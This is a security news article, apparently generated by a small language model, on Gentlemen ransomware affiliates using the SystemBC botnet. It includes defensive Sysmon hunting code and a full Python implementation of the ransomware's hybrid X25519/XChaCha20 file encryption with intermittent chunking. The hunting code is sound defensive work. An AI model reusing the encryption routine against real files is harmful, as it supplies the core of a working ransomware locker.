Ethical Hacking News
Researchers investigating a Gentlemen ransomware attack have found that the gang's affiliates are expanding their toolkit and infrastructure, most notably by making heavy use of the SystemBC proxy malware. The affiliate's integration with SystemBC has raised concerns because the botnet behind it is largely made up of corporate victims. This article looks at the tactics the affiliate used, the botnet it leaned on, and how the ransomware itself encrypts files.

In brief: the Gentlemen affiliate operates alongside a SystemBC botnet of more than 1,570 hosts, many of them corporate victims, which remains active despite law enforcement action in 2024. The ransomware uses a hybrid encryption scheme based on X25519 and XChaCha20 and terminates database, backup and virtualization processes before encrypting files. The adoption of SystemBC points to growing operations and increased sophistication, and visibility into the intrusion chain described below is the practical defense.
According to recent findings by Check Point researchers, the Gentlemen ransomware affiliate is expanding its attack toolkit and infrastructure, including extensive use of proxy malware. The botnet, comprising more than 1,570 hosts believed to be corporate victims, was discovered during an investigation into a Gentlemen ransomware attack carried out by a gang affiliate.
SystemBC has been around since at least 2019 and is used for SOCKS5 proxy tunneling. Its ability to deliver additional malicious payloads led to its quick adoption by ransomware gangs. Despite a law enforcement operation that disrupted it in 2024, the botnet remains active: Black Lotus Labs reported last year that it was sustaining roughly 1,500 infected commercial virtual private servers (VPS) per day.
In the investigated intrusion, the Gentlemen threat actor was already operating from a Domain Controller with Domain Admin privileges; how that foothold was obtained is not reported. From there they conducted reconnaissance, deployed Cobalt Strike payloads to remote systems via RPC, and used Mimikatz and other credential harvesting for lateral movement. The attackers staged the ransomware on an internal server and used its built-in propagation together with Group Policy (GPO) to trigger near-simultaneous execution of the encryptor across domain-joined systems. Each of these steps leaves telemetry a defender can hunt for: an unexpected process opening LSASS, a modified Group Policy object, and the same binary launching on many hosts within seconds.
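As an added example that is not from the original article or from the referenced research, the following Python hunting logic runs over constructed Sysmon and Windows Security events shaped like that chain: an unexpected process opening LSASS (Sysmon Event ID 10), a Group Policy object modification (Security Event ID 5136), and one binary launching on many hosts inside a short window (Sysmon Event ID 1). The host names, paths, hash placeholders, allow-list and thresholds are assumptions to be tuned for a real estate.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs) for the chain the article describes:
# Sysmon EventID 10 (process access) for LSASS reads, Security EventID 5136 for a
# Group Policy object change, Sysmon EventID 1 (process create) for the encryptor
# launching on many hosts at once. Hosts, paths, users and hashes are placeholders.
SAMPLE_LOG = r"""
{"ts":"2026-04-20T09:50:12Z","host":"DC01","EventID":10,"SourceImage":"C:\\Temp\\mk.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1010"}
{"ts":"2026-04-20T09:51:00Z","host":"WS02","EventID":10,"SourceImage":"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe","GrantedAccess":"0x1400"}
{"ts":"2026-04-20T09:58:30Z","host":"DC01","EventID":5136,"ObjectClass":"groupPolicyContainer","ObjectDN":"CN={PLACEHOLDER-GUID},CN=Policies,CN=System,DC=corp,DC=example","AttributeLDAPDisplayName":"versionNumber","SubjectUserName":"admin"}
{"ts":"2026-04-20T09:59:10Z","host":"WS01","EventID":1,"Image":"C:\\Windows\\System32\\svchost.exe","Hashes":"SHA256=BENIGNHASH"}
{"ts":"2026-04-20T10:00:03Z","host":"WS01","EventID":1,"Image":"C:\\Windows\\Temp\\upd.exe","Hashes":"SHA256=ENCRYPTORHASH"}
{"ts":"2026-04-20T10:00:04Z","host":"WS02","EventID":1,"Image":"C:\\Windows\\Temp\\upd.exe","Hashes":"SHA256=ENCRYPTORHASH"}
{"ts":"2026-04-20T10:00:07Z","host":"WS03","EventID":1,"Image":"C:\\Windows\\Temp\\upd.exe","Hashes":"SHA256=ENCRYPTORHASH"}
{"ts":"2026-04-20T10:00:09Z","host":"WS04","EventID":1,"Image":"C:\\Windows\\Temp\\upd.exe","Hashes":"SHA256=ENCRYPTORHASH"}
{"ts":"2026-04-20T10:00:15Z","host":"FS01","EventID":1,"Image":"C:\\Windows\\Temp\\upd.exe","Hashes":"SHA256=ENCRYPTORHASH"}
{"ts":"2026-04-20T10:00:19Z","host":"WS06","EventID":1,"Image":"C:\\Windows\\Temp\\upd.exe","Hashes":"SHA256=ENCRYPTORHASH"}
{"ts":"2026-04-20T10:03:00Z","host":"WS03","EventID":1,"Image":"C:\\Windows\\System32\\svchost.exe","Hashes":"SHA256=BENIGNHASH"}
"""

# assumption: processes allowed to open LSASS in this estate; tune to your AV/EDR stack
LSASS_READERS_OK = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe"}


def parse(log: str):
    """Parse JSON lines into dicts with a datetime field, oldest first."""
    events = []
    for line in log.strip().splitlines():
        e = json.loads(line)
        e["time"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return sorted(events, key=lambda e: e["time"])


def detect(events, burst_hosts=5, burst_window=60, gpo_lookback=3600):
    """Return alerts for LSASS access, GPO edits, and a one-binary execution burst.
    Thresholds (hosts per window, seconds) are assumptions to tune per environment."""
    alerts, gpo_times, by_hash = [], [], defaultdict(list)
    for e in events:
        if e["EventID"] == 10 and e["TargetImage"].lower().endswith("\\lsass.exe"):
            src = e["SourceImage"].rsplit("\\", 1)[-1].lower()
            if src not in LSASS_READERS_OK:
                alerts.append({"rule": "lsass_access", "host": e["host"], "source": e["SourceImage"]})
        elif e["EventID"] == 5136 and e.get("ObjectClass") == "groupPolicyContainer":
            gpo_times.append(e["time"])
            alerts.append({"rule": "gpo_modified", "host": e["host"], "dn": e["ObjectDN"],
                           "by": e.get("SubjectUserName")})
        elif e["EventID"] == 1:
            by_hash[e["Hashes"]].append(e)
    for h, execs in by_hash.items():  # execs keep the global time order
        for i, first in enumerate(execs):
            end = first["time"] + timedelta(seconds=burst_window)
            hosts = {x["host"] for x in execs[i:] if x["time"] <= end}
            if len(hosts) >= burst_hosts:
                start = first["time"] - timedelta(seconds=gpo_lookback)
                alerts.append({"rule": "mass_execution", "hash": h, "image": first["Image"],
                               "host_count": len(hosts), "first_seen": first["ts"],
                               "preceded_by_gpo_change": any(start <= t <= first["time"] for t in gpo_times)})
                break  # one alert per binary is enough
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

The burst rule keys on the file hash rather than the path because GPO-driven deployment tends to drop the same binary under different names; correlating it with a recent GPO change is what separates a mass rollout by an attacker from a legitimate software push, which should come from a change-managed account at a scheduled time.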
In terms of encryption, Gentlemen uses a hybrid scheme based on X25519 (Diffie–Hellman) and XChaCha20, with an ephemeral key pair generated for each file; the ephemeral private key serves only to derive that file's key, so recovery depends on the operator's static private key. Before encrypting, the malware terminates databases, backup software, and virtualization processes so that file locks and live backups do not get in the way. Files under 1 MB are encrypted in full, while larger files have only chunks of data encrypted, a speed trade-off known as intermittent encryption that still leaves the file unusable.
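The scheme above, written out as an added illustration rather than code from the malware or from any vendor: pure-Python X25519 (RFC 7748) and XChaCha20 (RFC 8439 plus the XChaCha construction), a fresh ephemeral key pair per file, full encryption below 1 MB and chunked encryption above it. The key derivation (SHA-256 over the shared secret and both public keys), the container layout (ephemeral public key, nonce, body) and the chunk pattern (first 64 KiB of each 1 MiB) are assumptions the page does not state. The size limit, chunk and stride are parameters so the pure-Python cipher can be exercised on small inputs.

```python
import hashlib
import os
import struct

# Added illustration of the scheme the article describes; primitives follow RFC 7748 /
# RFC 8439 / the XChaCha draft. KDF, container layout, chunk size and stride are
# assumptions, not details taken from the malware.
P = 2**255 - 19
BASEPOINT = (9).to_bytes(32, "little")
MASK = 0xFFFFFFFF
CONSTANTS = (0x61707865, 0x3320646E, 0x79622D32, 0x6B206574)  # "expand 32-byte k"
FULL_ENCRYPT_LIMIT = 1 << 20        # page: files under 1 MB are encrypted in full
CHUNK, STRIDE = 64 * 1024, 1 << 20  # assumption: first 64 KiB of every 1 MiB otherwise


def x25519(k: bytes, u: bytes) -> bytes:
    """RFC 7748 Montgomery ladder: clamped scalar k times u-coordinate u."""
    k = bytearray(k); k[0] &= 248; k[31] = (k[31] & 127) | 64
    k = int.from_bytes(k, "little")
    x1 = int.from_bytes(u, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        if swap ^ kt:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        da, cb = (x3 - z3) * a % P, (x3 + z3) * b % P
        x3, z3 = pow(da + cb, 2, P), x1 * pow(da - cb, 2, P) % P
        x2, z2 = aa * bb % P, e * (aa + 121665 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def _rotl(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK


def _chacha_rounds(state):
    s = list(state)

    def qr(a, b, c, d):
        s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
        s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
        s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
        s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)

    for _ in range(10):  # 20 rounds: 10 column/diagonal double rounds
        qr(0, 4, 8, 12); qr(1, 5, 9, 13); qr(2, 6, 10, 14); qr(3, 7, 11, 15)
        qr(0, 5, 10, 15); qr(1, 6, 11, 12); qr(2, 7, 8, 13); qr(3, 4, 9, 14)
    return s


def xchacha20_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """HChaCha20 turns the key and first 16 nonce bytes into a subkey; ChaCha20 then
    runs with the last 8 nonce bytes. XOR with the keystream is its own inverse."""
    h = _chacha_rounds(CONSTANTS + struct.unpack("<8L", key) + struct.unpack("<4L", nonce[:16]))
    subkey = tuple(h[0:4] + h[12:16])
    nonce_words = (0,) + struct.unpack("<2L", nonce[16:24])
    out = bytearray()
    for counter, off in enumerate(range(0, len(data), 64)):
        state = CONSTANTS + subkey + (counter,) + nonce_words
        ks = struct.pack("<16L", *((a + b) & MASK for a, b in zip(_chacha_rounds(state), state)))
        out += bytes(x ^ y for x, y in zip(data[off:off + 64], ks))
    return bytes(out)


def encrypted_regions(size, limit, chunk, stride):
    """Byte ranges that get encrypted: the whole file below the limit, else chunks."""
    if size < limit:
        return [(0, size)]
    return [(off, min(off + chunk, size)) for off in range(0, size, stride)]


def _apply(key, nonce, data, regions):
    """XOR only the selected regions with one continuous keystream (encrypt == decrypt)."""
    xored = xchacha20_xor(key, nonce, b"".join(data[a:b] for a, b in regions))
    buf, pos = bytearray(data), 0
    for a, b in regions:
        buf[a:b] = xored[pos:pos + b - a]
        pos += b - a
    return bytes(buf)


def _file_key(shared, eph_pk, static_pk):
    # assumption: the page names no KDF; SHA-256 over the DH output and both public keys
    return hashlib.sha256(shared + eph_pk + static_pk).digest()


def encrypt_file(data, attacker_pk, limit=FULL_ENCRYPT_LIMIT, chunk=CHUNK, stride=STRIDE):
    eph_sk = os.urandom(32)                 # fresh per file, discarded after use
    eph_pk = x25519(eph_sk, BASEPOINT)
    key = _file_key(x25519(eph_sk, attacker_pk), eph_pk, attacker_pk)
    nonce = os.urandom(24)
    body = _apply(key, nonce, data, encrypted_regions(len(data), limit, chunk, stride))
    return eph_pk + nonce + body            # assumed container: eph_pk || nonce || body


def decrypt_file(blob, attacker_sk, limit=FULL_ENCRYPT_LIMIT, chunk=CHUNK, stride=STRIDE):
    """Only the holder of the attacker's static private key can rebuild the file key."""
    eph_pk, nonce, body = blob[:32], blob[32:56], blob[56:]
    attacker_pk = x25519(attacker_sk, BASEPOINT)
    key = _file_key(x25519(attacker_sk, eph_pk), eph_pk, attacker_pk)
    return _apply(key, nonce, body, encrypted_regions(len(body), limit, chunk, stride))
```

decrypt_file works only with the static private key, which is the point of the design: once the encryptor discards each ephemeral private half there is nothing left on the victim's disk to recover keys from, and memory forensics of the running process is the only realistic avenue. Note also that XChaCha20 on its own provides no integrity, which matches the page's description naming no authentication tag.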
The gang's use of SystemBC in bot-powered attacks is seen as a sign of growing operations: the affiliate is plugging into broader toolchains and proxy infrastructure, which widens the pool of potential corporate victims. That increasing sophistication makes endpoint visibility, credential hygiene and tight control over Group Policy changes essential defenses against such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Evolution-of-Gentlemen-Ransomware-A-Look-into-its-Bot-Powered-Attacks-ehn.shtml
https://www.bleepingcomputer.com/news/security/the-gentlemen-ransomware-now-uses-systembc-for-bot-powered-attacks/
https://thehackernews.com/2025/09/systembc-powers-rem-proxy-with-1500.html
https://cybersecuritynews.com/systembc-botnet-hacking-1500-vps-servers/
Published: Mon Apr 20 16:14:47 2026 by llama3.2 3B Q4_K_M